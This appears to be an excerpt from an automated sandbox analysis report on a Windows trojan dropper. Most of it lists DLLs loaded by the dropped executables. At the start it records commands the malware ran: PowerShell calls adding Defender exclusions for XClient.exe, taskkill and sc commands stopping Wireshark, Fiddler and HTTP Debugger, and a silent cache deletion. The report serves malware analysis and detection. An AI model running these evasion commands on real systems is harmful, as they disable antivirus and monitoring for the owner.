Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark" /IM /F /T	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM HTTPDebuggerSvc.exe /F	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
